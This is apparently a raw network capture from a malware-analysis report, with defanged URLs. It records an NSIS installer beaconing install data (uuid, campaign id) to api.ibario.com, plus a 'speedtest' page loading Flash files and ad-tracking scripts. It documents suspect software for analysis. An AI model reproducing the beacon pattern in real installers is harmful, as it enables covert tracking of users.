Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; _ga=GA1.2.476553240.1407549896; __utma=125033355.476553240.1407549896.1407549901.1407549901.1; __utmb=125033355.1.10.1407549901; __utmc=125033355; __utmz=125033355.1407549901.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); norjs=1<br>
<br>
domain=www.performersoft.com&action=init</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:12 GMT<br>
Content-Type: text/html<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
Vary: Accept-Encoding<br>
X-Powered-By: PHP/5.4.17<br>
Set-Cookie: norjs=1; path=/<br>
Content-Encoding: gzip<br><pre>b8..............A..0.Eo.].c,..Y..N....iP3!.T..7........._|&..0!..._.X.<br>.{.F.K.8..q.y=:.H.....#."....b 8........=4...W7..nv1 ...^.........4..A<br>.........../..d....e...yV\../...J.H.R...T>..t.....0..</font>....</pre></font><br><br><font color="red">GET /component/graphics.swf?nocache=413332.6606824994 HTTP/1.1<br>
Accept: */*<br>
Accept-Language: en-US<br>
Referer: hXXp://VVV.performersoft.com/component/logics.swf?nocache=9082<br>
x-flash-version: 11,6,602,168<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; _ga=GA1.2.476553240.1407549896; __utma=125033355.476553240.1407549896.1407549901.1407549901.1; __utmb=125033355.1.10.1407549901; __utmc=125033355; __utmz=125033355.1407549901.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:13 GMT<br>
Content-Type: application/x-shockwave-flash<br>
Content-Length: 46752<br>
Last-Modified: Sun, 30 Mar 2014 11:59:36 GMT<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
ETag: "53380728-b6a0"<br>
Expires: Sat, 09 Aug 2014 03:05:13 GMT<br>
Cache-Control: max-age=3600<br>
Set-Cookie: norjs=1; path=/<br>
Accept-Ranges: bytes<br><pre>CWS.#...x..|w\..........BG.F.4.. 6.AE..(.....@0..=.bW....^.{9 v.F@l...<br>....;...yg.$..........s[fvfvvfvv.9a...B....6|4...!.Hm....M?.b.. O.K. &<br>gt;JNKV#./.......Z....8...i)JY".f..-O%..LQg ....X..H... .Wh...H..!...!<br>:B.#5...hr.mMI....%....|....x5_..y.....(.....k. "[email protected]?.."<br>..4....c........!..m-.Jb...=..._......q.....H.*9m2..T..ei.....r.?,~.&l<br>t;Am..L......2..S}..*9..R.GM..'9Mm.....C..rApfZ.:Y....R..M.)..$.y.<<br>M..."..6.H$22...D.a......'%'..........e..LF.rz.J.T1I..r.gJp."...!6.(.p<br>.R.........Me..\.......-..z.y......*.......I......&.G.E..Dq.m..LS$O.T.<br>..[...<..W...~......k1..R.<E.-..$..NO..4....j.YQ..rn.L..........<br>..I-O..a,%[email protected].<1R-S..N..I.0..T.R.,.....[..6..?sG&.R.".<br>e...V"" .T..T.|.z.2Q.H..I.TO..JO....a...U.l.V....l.7...K'.>.h....,.<br>Zv..J..(W...`RX.Z.LN...$...3...4Y|......b.0;W .......X.....4S.^.IB..fb<br>....,L.....:.|V...........r5XD...]x..~..c...&K%.JV.........LHPv_..k...<br>.F..J...t../c.dT..$...4I..M..r....;.R...3.,.v....dE...S..GbL@,8.b.!2.w<br>Fv..../..d."Y...LJNI.N....Z.2...y*(..`\>L...G.,..Od...b.$H-t*.W5...<br>>.$&g..aF(....)........|}...y...L.T....D:].....B.f..o.2.....>I.N<br>...Y......R;.......o.....)..4F/6M.6......<....*.....<.W....0.:..<br>x.z&...2.je...rz...N..!eC.IQN....-.42,-19A.V.`.r.B.....k.\!.u..N;..z.a<br>m._.*.V....%....M.t.7=.MO~..l._s.:9È8.=.d.l...#........2.2.2 Y.*K...<br>...Z..F..J...hi.e ...!P ...!..d..M;).....O...B A...x.) .. x...L...t...<br>$.=.$.yb.,%%#Ji....a..l...48bT.J.T..k...1.-[..F.0....B.3..I.I.t9/...I.<br>.\..;.lDJ..*T.T...J0.l....bJ.cw:lK....L.i.,].....N.g..f.\.........</pre><<< skipped >>></font><br><br
<font color="red">GET /utils/dns HTTP/1.1<br>
User-Agent: NSIS_Inetc (Mozilla)<br>
Host: api.ibario.com<br>
Connection: Keep-Alive<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:04:36 GMT<br>
Content-Type: text/html<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
Vary: Accept-Encoding<br>
X-Powered-By: PHP/5.4.13<br><pre>17..hXXp://VVV.appregis.com..0..HTTP/1.1 200 OK..Server: nginx..Date: <br>Sat, 09 Aug 2014 02:04:36 GMT..Content-Type: text/html..Transfer-Encod<br>ing: chunked..Connection: keep-alive..Keep-Alive: timeout=2..Vary: Acc<br>ept-Encoding..X-Powered-By: PHP/5.4.13..17..hXXp://VVV.appregis.com..0<br>..</font>....</pre></font><br><br><font color="red">POST /events HTTP/1.1<br>
Content-Type: application/x-www-form-urlencoded<br>
X-Token: 1ac1acb5747d4b6db021a1ac3947003b<br>
X-Hash: abdee05783fe5b23e095935a51a00b6bd959f7d7<br>
User-Agent: NSIS_Inetc (Mozilla)<br>
Host: api.ibario.com<br>
Content-Length: 176<br>
Connection: Keep-Alive<br>
Cache-Control: no-cache<br>
<br>
{"country":"","timestamp":"2014-08-09 5:04:25","uuid":"75ed9567aa584c8ea8ea3cad7c47ab03","session":"1599991063","component_id":"","cid":"4751","action":"start","error_type":""}</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:04:37 GMT<br>
Content-Type: application/json<br>
Transfer-Encoding: chunked<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
Vary: Accept-Encoding<br>
X-Powered-By: PHP/5.4.13<br>
Access-Control-Allow-Origin: *<br><pre>27..{"flash":{},"error":false,"status":200}..0..HTTP/1.1 200 OK..Serve<br>r: nginx..Date: Sat, 09 Aug 2014 02:04:37 GMT..Content-Type: applicati<br>on/json..Transfer-Encoding: chunked..Connection: keep-alive..Keep-Aliv<br>e: timeout=2..Vary: Accept-Encoding..X-Powered-By: PHP/5.4.13..Access-<br>Control-Allow-Origin: *..27..{"flash":{},"error":false,"status":200}..<br>0..</pre></font><br><br
<font color="red">GET /ajax/libs/jquery/1.9.1/jquery.min.js HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: ajax.googleapis.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Content-Type: text/javascript; charset=UTF-8<br>
Last-Modified: Fri, 08 Feb 2013 15:35:10 GMT<br>
Date: Fri, 08 Aug 2014 05:34:26 GMT<br>
Expires: Sat, 08 Aug 2015 05:34:26 GMT<br>
Access-Control-Allow-Origin: *<br>
Timing-Allow-Origin: *<br>
X-Content-Type-Options: nosniff<br>
Server: sffe<br>
Content-Length: 32819<br>
X-XSS-Protection: 1; mode=block<br>
Cache-Control: public, max-age=31536000<br>
Age: 73840<br>
Alternate-Protocol: 80:quic<br><pre>............{{...7...."........o...v..q.[cg'-E..HPBL....RD....[kf0.Pq.<br>~.sNZ.....f......._..M...wg.?...vG.<8z2.........E...q...:z..GT.._.f<br>.....t.de.....uT..b.|.o6iv..._E..:.F.x...O..6..*?QUp....2U.4..6I.<.<br>T.%.E>....R1....4^..tIm...ZE.{5..3..<.....|4.3.D-.r.-o..]......4<br>[$....:Z...UUP_...........|....z.mF.r...f......Q..?..-3.0..F..^.F....l<br>.O........\..f.|1..t..NG2U.}tz.jxz.^G.o......./^\.>......#*........<br>../.../........|zp2{...N.3*....~.\../O'...g...g.;.~.M.Tx..,g.....).y..<br>w*@...i.^...]........2 ..n;.\.'..'/f....*.4:..oP...f..]Ul..2^.....V...<br>.....V.P.N....z......o3z.........aC..,.....K.\p...x......WiY%YR.v.*..^<br>.......<_oVI..a>*.xq....$8>....u%......n ..V?.Q.:..4....o.~.g<br>..Q...S_..Y.....G)..T.".......<......&...*..Z.t%[email protected].<br>h...X.*/. .H.....){4U.y...I`..&-.. y.....L.O....Lf..X<..1M.w.xD;;..<br>...3zgn...'S.....g.~3Jn.9-..... .....3..A..e#.....".-i.S..].9..3..=GE.<br>.,..R*.gs..j.M..0.._'.u......E.|.....K.Q'FY.H^..'.(.OK.\.-.T...8...Q..<br>..v||5J..Vq.}{.K2..K..z.R....o_..G..t.L....NF.W.}....."{.NLP|.T_......<br>..j..,P..q.Q..o..<.x...Q..t=..$nJ.%:S...,..N...*.......d.`....M...)<br>....T.7....|$...[......E..h.......`b.......iQ.w...-n>.=OIw..*......<br>..H...r.....h..V.Aj..&t..9M..is.j.t]~../...ik......l.p.....mT.=[E..7v.<br>...n./$...y=T.X.s...J......j.w.W.|.x..F..*..:....>K...d....f.......<br>...&...7./.2-..P......j.?X.p.....9u.Ae.0...D.....~f.......&...l6..3...<br>...i}.(.. m.Je.x...p5.:..d...gWz...G..@.*\.2/*..............>...g..<br>`...w....f.....\.D...#D...E.%.......G..s`K.*.WI...NI.......LeO...&</pre><<< skipped >>></font><br><br
<font color="red">GET /ads/conversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=1841122896&ipr=y HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Connection: Keep-Alive<br>
Host: VVV.google.com.ua<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Sat, 09 Aug 2014 02:05:12 GMT<br>
Pragma: no-cache<br>
Expires: Fri, 01 Jan 1990 00:00:00 GMT<br>
Cache-Control: no-cache, no-store, must-revalidate<br>
Content-Type: text/html; charset=UTF-8<br>
X-Content-Type-Options: nosniff<br>
Content-Encoding: gzip<br>
Server: adclick_server<br>
Content-Length: 76<br>
X-XSS-Protection: 1; mode=block<br>
Alternate-Protocol: 80:quic<br><pre>............(....I.O.T(...I.UJJL.N/./.K.M.../.*)J. .H,J. Q......R`....<br>h.?...HTTP/1.1 200 OK..Date: Sat, 09 Aug 2014 02:05:12 GMT..Pragma: no<br>-cache..Expires: Fri, 01 Jan 1990 00:00:00 GMT..Cache-Control: no-cach<br>e, no-store, must-revalidate..Content-Type: text/html; charset=UTF-8..<br>X-Content-Type-Options: nosniff..Content-Encoding: gzip..Server: adcli<br>ck_server..Content-Length: 76..X-XSS-Protection: 1; mode=block..Altern<br>ate-Protocol: 80:quic..............(....I.O.T(...I.UJJL.N/./.K.M.../.*<br>)J. .H,J. Q......R`....h.?.....</pre></font><br><br
<font color="red">GET /ttj?id=3222726&referrer=[REFERRER_URL] HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: ib.adnxs.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 302 Found<br>
Cache-Control: no-store, no-cache, private<br>
Pragma: no-cache<br>
Expires: Sat, 15 Nov 2008 16:00:00 GMT<br>
P3P: policyref="hXXp://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"<br>
X-XSS-Protection: 0<br>
Set-Cookie: uuid2=0; path=/; expires=Fri, 07-Nov-2014 02:05:07 GMT; domain=.adnxs.com; HttpOnly<br>
Set-Cookie: sess=1; path=/; expires=Sun, 10-Aug-2014 02:05:07 GMT; domain=.adnxs.com; HttpOnly<br>
Set-Cookie: uuid2=7887817462876364047; path=/; expires=Fri, 07-Nov-2014 02:05:07 GMT; domain=.adnxs.com; HttpOnly<br>
Location: hXXp://ib.adnxs.com/bounce?/ttj?id=3222726&referrer=[REFERRER_URL]<br>
Content-Type: text/html; charset=utf-8<br>
Date: Sat, 09 Aug 2014 02:05:07 GMT<br>
Content-Length: 0<br><pre>HTTP/1.1 302 Found..Cache-Control: no-store, no-cache, private..Pragma<br>: no-cache..Expires: Sat, 15 Nov 2008 16:00:00 GMT..P3P: policyref="ht<br>tp://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo <br>OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"..X-XSS-Protection: 0..Set<br>-Cookie: uuid2=0; path=/; expires=Fri, 07-Nov-2014 02:05:07 GMT; domai<br>n=.adnxs.com; HttpOnly..Set-Cookie: sess=1; path=/; expires=Sun, 10-Au<br>g-2014 02:05:07 GMT; domain=.adnxs.com; HttpOnly..Set-Cookie: uuid2=78<br>87817462876364047; path=/; expires=Fri, 07-Nov-2014 02:05:07 GMT; doma<br>in=.adnxs.com; HttpOnly..Location: hXXp://ib.adnxs.com/bounce?/ttj%3<br>Fid=3222726&referrer=[REFERRER_URL]..Content-Type: text/html<br>; charset=utf-8..Date: Sat, 09 Aug 2014 02:05:07 GMT..Content-Length: <br>0..</font>....</pre><<< skipped >>></font><br><br><font color="red">GET /bounce?/ttj?id=3222726&referrer=[REFERRER_URL] HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: ib.adnxs.com<br>
Connection: Keep-Alive<br>
Cookie: uuid2=7887817462876364047; sess=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Cache-Control: no-store, no-cache, private<br>
Pragma: no-cache<br>
Expires: Sat, 15 Nov 2008 16:00:00 GMT<br>
P3P: policyref="hXXp://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"<br>
X-XSS-Protection: 0<br>
Set-Cookie: uuid2=7887817462876364047; path=/; expires=Fri, 07-Nov-2014 02:05:08 GMT; domain=.adnxs.com; HttpOnly<br>
Set-Cookie: sess=1; path=/; expires=Sun, 10-Aug-2014 02:05:08 GMT; domain=.adnxs.com; HttpOnly<br>
Content-Type: text/html; charset=utf-8<br>
Date: Sat, 09 Aug 2014 02:05:08 GMT<br>
Content-Length: 1034<br><pre>!function(){function n(n){try{if(!window.location.ancestorOrigins)retu<br>rn;for(var r=0,o=window.location.ancestorOrigins.length;o>r;r  )n.c<br>all(null,window.location.ancestorOrigins[r],r)}catch(t){}return[]}func<br>tion r(n){var r,o=[];do try{r=r?r.parent:window,n.call(null,r,o)}catch<br>(t){return o.push({referrer:null,location:null,isTop:!1}),o}while(r!==<br>window.top);return o}var o=r(function(n,r){try{r.push({referrer:n.docu<br>ment.referrer||null,location:n.location.href||null,isTop:n===window.to<br>p})}catch(o){r.push({referrer:null,location:null,isTop:n===window.top}<br>)}});n(function(n,r){o[r].ancestor=n});for(var t="",e=!1,i=o.length-1,<br>l=o.length-1;l>=0;l--)if(t=o[l].location,!t&&l>0&&(t=o[l-1].refe<br>rrer,t||(t=o[l-1].ancestor)),t){e=window.location.ancestorOrigins?!0:l<br>==o.length-1&&o[o.length-1].isTop;break}t=encodeURIComponent(t);var c=<br>"&bdref=" t "&bdtop=" e "&bdifs=" i;document.write('<script src="ht<br>tp://ib.adnxs.com/ttj?ttjb=1&bdc=1407549908&bdh=B-C0wF_vJGE4ovFan2_T-S<br>XXLqk.' c '&id=3222726&referrer=[REFERRER_URL]"></scr' 'ipt>'<br>)}();</font>....</pre><<< skipped >>></font><br><br><font color="red">GET /ttj?ttjb=1&bdc=1407549908&bdh=B-C0wF_vJGE4ovFan2_T-SXXLqk.&bdref=http://VVV.performersoft.com/speedtest/?cid=4751&bdtop=true&bdifs=1&id=3222726&referrer=[REFERRER_URL] HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: ib.adnxs.com<br>
Connection: Keep-Alive<br>
Cookie: uuid2=7887817462876364047; sess=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Cache-Control: no-store, no-cache, private<br>
Pragma: no-cache<br>
Expires: Sat, 15 Nov 2008 16:00:00 GMT<br>
P3P: policyref="hXXp://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"<br>
X-XSS-Protection: 0<br>
Set-Cookie: uuid2=7887817462876364047; path=/; expires=Fri, 07-Nov-2014 02:05:08 GMT; domain=.adnxs.com; HttpOnly<br>
Set-Cookie: sess=1; path=/; expires=Sun, 10-Aug-2014 02:05:08 GMT; domain=.adnxs.com; HttpOnly<br>
Set-Cookie: icu=ChII_-wYEAoYASABKAEw1IOWnwUQ1IOWnwUYAA..; path=/; expires=Fri, 07-Nov-2014 02:05:08 GMT; domain=.adnxs.com; HttpOnly<br>
Set-Cookie: anj=dTM7k!M4.NCxrEQDgEREg0D`mgx!ea#uqzhcb7D(5Cs1%; path=/; expires=Fri, 07-Nov-2014 02:05:08 GMT; domain=.adnxs.com; HttpOnly<br>
Content-Type: application/javascript; charset=utf-8<br>
Date: Sat, 09 Aug 2014 02:05:08 GMT<br>
Content-Length: 2059<br><pre>var apn_geo = {..  "FR" : {click_url: "hXXp://www4.smartadserver.com/c<br>all/cliccommand/10656433/286342", img_url : "hXXp://cdn.adnxs.com/p/aa<br>/af/d9/27/aaafd92704a0cc6952b4cbc1eea352f7.JPG"},..  "DE" : {click_url<br>: "hXXps://VVV.unicef.de/spenden/jetzt-spenden", img_url : "hXXp://cdn<br>.adnxs.com/p/92/3a/b0/42/923ab042aa5ccc0bbca187eb929aaa4d.jpg"},..  "U<br>S" : {click_url: "hXXps://VVV.unicefusa.org/donate/donate-end-preventa<br>ble-deaths-children", img_url : "hXXp://cdn.adnxs.com/p/8c/61/a7/a2/8c<br>61a7a22bbf3762f49905913986b68c.jpg"},..  "GB" : {click_url: "hXXp://ww<br>w.unicef.org.uk/donate/donate-now/", img_url : "hXXp://cdn.adnxs.com/p<br>/9f/1a/f4/f9/9f1af4f9eac2fea2a7d208a6b3c03656.jpg"},..  "BR" : {click_<br>url: "hXXps://secure.unicef.org.br", img_url : "hXXp://cdn.adnxs.com/p<br>/78/47/52/64/78475264d818c4a2d2a7ba97ccc2cb32.jpg"},..  "PT" : {click_<br>url: "hXXp://VVV.unicef.pt/artigo.php?mid=18101116&m=7&sid=1810111611"<br>, img_url : "hXXp://cdn.adnxs.com/p/78/47/52/64/78475264d818c4a2d2a7ba<br>97ccc2cb32.jpg"},..}..if ("UA" in apn_geo) {..document.write("<a ta<br>rget=\"_blank\" href=hXXp://nym1.ib.adnxs.com/click?AAAAAAAAAAAAAAAAAA<br>AAAFCNl24Sg9g_AAAAAAAAAAAAAAAAAAAAAMRN-CPf6nhmD13e5zAod23UgeVTAAAAAMYs<br>MQDPCAAA5QAAAAIAAACqpgUBgR4HAAAAAQAAAAAAVVNEANgCWgAbxAAAAAAAAgEAAQIAAJ<br>IA0Ra2NQAAAAA./referrer=http://VVV.performersoft.com/speedtest<br>/?cid=4751/clickenc="   apn_geo["UA"].click_url..   "><img<br> src="   apn_geo["UA"].img_url   "></a>");  ..}else {..  img_<br>url = "hXXp://cdn.adnxs.com/p/9f/1a/f4/f9/9f1af4f9eac2fea2a7d208a6</pre><<< skipped >>></font><br><br><font color="red">GET /ttj?id=3222725&referrer=[REFERRER_URL] HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: ib.adnxs.com<br>
Connection: Keep-Alive<br>
Cookie: uuid2=7887817462876364047; sess=1; icu=ChII_-wYEAoYASABKAEw1IOWnwUQ1IOWnwUYAA..; anj=dTM7k!M4.NCxrEQDgEREg0D`mgx!ea#uqzhcb7D(5Cs1%<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Cache-Control: no-store, no-cache, private<br>
Pragma: no-cache<br>
Expires: Sat, 15 Nov 2008 16:00:00 GMT<br>
P3P: policyref="hXXp://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"<br>
X-XSS-Protection: 0<br>
Set-Cookie: uuid2=7887817462876364047; path=/; expires=Fri, 07-Nov-2014 02:05:08 GMT; domain=.adnxs.com; HttpOnly<br>
Set-Cookie: sess=1; path=/; expires=Sun, 10-Aug-2014 02:05:08 GMT; domain=.adnxs.com; HttpOnly<br>
Content-Type: text/html; charset=utf-8<br>
Date: Sat, 09 Aug 2014 02:05:08 GMT<br>
Content-Length: 1034<br><pre>!function(){function n(n){try{if(!window.location.ancestorOrigins)retu<br>rn;for(var r=0,o=window.location.ancestorOrigins.length;o>r;r  )n.c<br>all(null,window.location.ancestorOrigins[r],r)}catch(t){}return[]}func<br>tion r(n){var r,o=[];do try{r=r?r.parent:window,n.call(null,r,o)}catch<br>(t){return o.push({referrer:null,location:null,isTop:!1}),o}while(r!==<br>window.top);return o}var o=r(function(n,r){try{r.push({referrer:n.docu<br>ment.referrer||null,location:n.location.href||null,isTop:n===window.to<br>p})}catch(o){r.push({referrer:null,location:null,isTop:n===window.top}<br>)}});n(function(n,r){o[r].ancestor=n});for(var t="",e=!1,i=o.length-1,<br>l=o.length-1;l>=0;l--)if(t=o[l].location,!t&&l>0&&(t=o[l-1].refe<br>rrer,t||(t=o[l-1].ancestor)),t){e=window.location.ancestorOrigins?!0:l<br>==o.length-1&&o[o.length-1].isTop;break}t=encodeURIComponent(t);var c=<br>"&bdref=" t "&bdtop=" e "&bdifs=" i;document.write('<script src="ht<br>tp://ib.adnxs.com/ttj?ttjb=1&bdc=1407549908&bdh=B-C0wF_vJGE4ovFan2_T-S<br>XXLqk.' c '&id=3222725&referrer=[REFERRER_URL]"></scr' 'ipt>'<br>)}();</font>....</pre><<< skipped >>></font><br><br><font color="red">GET /ttj?ttjb=1&bdc=1407549908&bdh=B-C0wF_vJGE4ovFan2_T-SXXLqk.&bdref=http://VVV.performersoft.com/speedtest/?cid=4751&bdtop=true&bdifs=1&id=3222725&referrer=[REFERRER_URL] HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: ib.adnxs.com<br>
Connection: Keep-Alive<br>
Cookie: uuid2=7887817462876364047; sess=1; icu=ChII_-wYEAoYASABKAEw1IOWnwUQ1IOWnwUYAA..; anj=dTM7k!M4.NCxrEQDgEREg0D`mgx!ea#uqzhcb7D(5Cs1%<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Cache-Control: no-store, no-cache, private<br>
Pragma: no-cache<br>
Expires: Sat, 15 Nov 2008 16:00:00 GMT<br>
P3P: policyref="hXXp://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"<br>
X-XSS-Protection: 0<br>
Set-Cookie: uuid2=7887817462876364047; path=/; expires=Fri, 07-Nov-2014 02:05:08 GMT; domain=.adnxs.com; HttpOnly<br>
Set-Cookie: sess=1; path=/; expires=Sun, 10-Aug-2014 02:05:08 GMT; domain=.adnxs.com; HttpOnly<br>
Set-Cookie: icu=ChII_-wYEAoYAiACKAIw1IOWnwUQ1IOWnwUYAQ..; path=/; expires=Fri, 07-Nov-2014 02:05:08 GMT; domain=.adnxs.com; HttpOnly<br>
Set-Cookie: anj=dTM7k!M4.NCxrEQDgEREg0D`mgx!ea#uqzhcb7D(5Cs1%; path=/; expires=Fri, 07-Nov-2014 02:05:08 GMT; domain=.adnxs.com; HttpOnly<br>
Content-Type: application/javascript; charset=utf-8<br>
Date: Sat, 09 Aug 2014 02:05:08 GMT<br>
Content-Length: 5961<br><pre>(function()..{..var flashAd='<OBJECT id="7265679920822525182" data=<br>"hXXp://cdn.adnxs.com/p/03/ca/cc/7d/03cacc7d05899aea99056522d1bc9eb6.s<br>wf" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="300" H<br>EIGHT="250" flashvars="clickTAG=http://nym1.ib.adnxs.com/click<br>?oOnlu991iz92hej14raIP6RwPQrXo9g_doXo9eK2iD-f6eW733WLP_6cUIxk4dRkD13<br>e5zAod23UgeVTAAAAAMUsMQDPCAAAnwMAAAIAAAD_cAgBgR4HAAAAAQBVU0QAVVNEACwB-<br>gAbxAAAPeQAAgUAAQIAAJIALC7cfwAAAAA./cnd=%21JgYwOgiTxpcCEP_hoQgYg<br>b0cIAA./referrer=http%3A%2F%2FVVV.performersoft.com%2Fspee<br>dtest%2F%3Fcid%3D4751/clickenc=http%3A%2F%2Ftrack.popm<br>og.com%2Fc%2F2047049%2Fclick%3Fsubid%3D3222725%26sspdata%2<br>53Dnym1CI-6-b6Ohsq7bRACGP65wuLIrLjqZCIPMTkzLjEzOC4yNDQuMjMxKAEw1IOWnwU<br>."><PARAM NAME=movie VALUE="hXXp://cdn.adnxs.com/p/03/ca/cc/7d/0<br>3cacc7d05899aea99056522d1bc9eb6.swf"><PARAM NAME=loop VALUE=true<br>><PARAM NAME=menu VALUE=false><PARAM NAME=quality VALUE=hi<br>gh><PARAM NAME=wmode VALUE="opaque"><PARAM NAME=bgcolor VA<br>LUE=#FFFFFF><PARAM NAME=allowscriptaccess VALUE=always><PA<br>RAM NAME=flashvars VALUE="clickTAG=http://nym1.ib.adnxs.com/cl<br>ick?oOnlu991iz92hej14raIP6RwPQrXo9g_doXo9eK2iD-f6eW733WLP_6cUIxk4dRk<br>D13e5zAod23UgeVTAAAAAMUsMQDPCAAAnwMAAAIAAAD_cAgBgR4HAAAAAQBVU0QAVVNEAC<br>wB-gAbxAAAPeQAAgUAAQIAAJIALC7cfwAAAAA./cnd=%21JgYwOgiTxpcCEP_hoQ<br>gYgb0cIAA./referrer=http%3A%2F%2FVVV.performersoft.com%2Fs<br>peedtest%2F%3Fcid%3D4751/clickenc=http%3A%2F%2Ftra</pre><<< skipped >>></font><br><br
<font color="red">GET /cookie.php?cid=4751 HTTP/1.1<br>
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.zulagames.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
